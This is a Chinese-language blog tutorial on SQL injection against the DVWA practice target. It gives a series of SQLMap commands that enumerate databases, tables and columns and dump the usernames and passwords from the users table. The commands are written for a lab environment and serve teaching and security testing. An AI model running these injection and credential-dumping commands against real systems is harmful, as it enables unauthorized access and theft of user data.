【安全/渗透测试】SQL注入、SQLMap工具、DVWA(靶机)
一、需要准备的工具或环境:浏览器、DVWA(靶机)、Python2、SQLMap
说明:Python2的作用是运行SQLMap
二、操作步骤:
1、通过浏览器的F12开发工具或其他开发工具,获取一个请求(访问的ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#)
2、利用SQLMap工具探测所有数据库
输入命令:sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --dbs --batch

探测出的所有数据库名如下图:

3、利用SQLMap工具探测当前数据库,则只需要把选项"--dbs"改为“--current-db”即可,
输入命令:sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --current-db --batch,探测出的当前数据库名如下图:

4、利用SQLMap工具探测当前数据库(dvwa)下的数据表名,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --table -D "dvwa" --batch,探测出的表名如下图:

5、利用SQLMap工具探测当前数据库(dvwa)下一个数据表(users)里的列名,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --columns -T "users" -D "dvwa" --batch,探测出的列名如下图:

6、利用SQLMap工具探测当前数据库(dvwa)下一个数据表(users)里指定列名(user_id,user,password)的数据,sqlmap.py -u "ip地址/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=1fabc60a12edc0265aafd08552179c35" --dump -C "user_id,user,password" --columns -T "users" -D "dvwa" --batch,探测出的数据如下图:

三、总结:先获取一个请求,然后使用SqlMap工具探测数据库,探测出数据库名后再依次探测数据表名、列名和数据。
本文来自博客园,作者:新时代,新篇章,转载请注明原文链接:https://www.cnblogs.com/zkzhan/p/13617749.html

浙公网安备 33010602011771号